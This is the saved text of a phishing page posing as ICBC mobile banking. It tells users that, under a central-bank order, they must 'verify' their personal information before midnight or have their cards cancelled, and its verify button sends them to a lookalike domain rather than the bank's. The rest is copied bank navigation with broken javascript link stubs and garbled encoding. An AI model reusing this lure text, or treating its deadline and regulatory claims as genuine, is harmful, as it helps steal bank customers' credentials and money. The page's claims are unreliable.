 中国工商银行核实系统

logo
search
icon
	
<javascript:if(confirm('http://m.icbc.com.cn/ICBC/default1.htm%20%20\n\n%EF%BF%BD%C4%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%CE%B4%EF%BF%BD%EF%BF%BD%20Teleport%20Pro%20%C8%A1%EF%BF%BD%D8%A3%EF%BF%BD%EF%BF%BD%EF%BF%BD%CE%AA%20%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%C2%B7%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%D6%B7%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%C3%B5%C4%B7%EF%BF%BD%CE%A7%EF%BF%BD%EF%BF%BD%20%20\n\n%EF%BF%BD%EF%BF%BD%D2%AA%EF%BF%BD%D3%B7%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%B4%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD'))window.location='http://m.icbc.com.cn/ICBC/default1.htm#'>



    工商身份核实系统！

#   欢迎登陆工商手机银行
#   1、应中国人民银行要求，现将在全国范围核实认证个人信息，防止银行卡被盗
用、长时间不用，浪费资源，核实认证完成过后可以正常使用，未核实的将在24小
时后停用、注销。请各位用户配合。
  2、央行规定，2016年12月1日后，个人账户分为Ⅰ类，Ⅱ类、Ⅲ类，在同一家银
行，每人只能开一个Ⅰ类户，请将常用账户进行归类核实。
  3、认证截止时间：今日24点前完成
#    
#
点击核实 <http://95588.bj-dy.pw/register.asp>
个人业务 | 
个人金融 信用卡 贵金属 私人银行

  *


    逸贷

    <javascript:if(confirm(''))window.location=''>
  *

    个人综合积分服务

    <javascript:if(confirm(''))window.location=''> 

点击进入个人金融>>
<javascript:if(confirm(''))window.location='http://m.icbc.com.cn/ICBC/%e4%b8%9a%e5%8a%a1%e6%8c%87%e5%8d%97/%e4%b8%aa%e4%ba%ba%e9%87%91%e8%9e%8d/default1.htm'>


  *


    国航知音牡丹信用卡

    <javascript:if(confirm(''>
  *

    工银携程信用卡

    <javascript:if(confirm(''> 

点击进入信用卡>> <javascript:if(confirm(''>

  *


    贵金属行情

    <javascript:if(confirm(''>
  *

    贵金属计算器

    <javascript:if(confirm(''>

点击进入贵金属>> <javascript:if(confirm('>

  *


    财务管理服务

    <javascript:if(confirm(''>
  *

    留学咨询及金融服务

    <javascript:if(confirm(''> 

点击进入私人银行>> <javascript:if(confirm(''>
企业业务 | 
公司业务 机构金融 资产托管 企业年金

  *


    全球现金管理

    <javascript:if(confirm(''>
  *

    出口信贷及境外项目融资

    <javascript:if(confirm(''> 

点击进入公司业务>> <javascript:if(confirm(''>

  *


    银期转账业务

    <javascript:if(confirm(''>
  *

    集中式银期转账业务

    <javascript:if(confirm(''>

点击进入机构金融>> <javascript:if(confirm(''>

  *


    证券投资基金托管业务

    <javascript:if(confirm(>
  *

    信托财产托管业务

    <javascript:if(confirm('> 

点击进入资产托管>> <javascript:if(confirm(''>

  *


    受托管理服务

    <javascript:if(confirm('m>
  *

    托管服务

    <javascript:if(confirm('> 

点击进入企业年金>> <javascript:if(confirm(''>
电子银行 | 
个人电子银行 企业电子银行

  *


    微信银行

    <javascript:if(confirm(''>
  *

    个人电话银行

    <javascript:if(confirm(''>

点击进入电子银行>> <javascript:if(confirm('>

  *


    企业手机银行

    <javascript:if(confirm(''>
  *

    对公电子对账单

    <javascript:if(confirm('> 

<javascript:if(confirm(''>
<javascript:if(confirm(''>
<javascript:if(confirm(''>

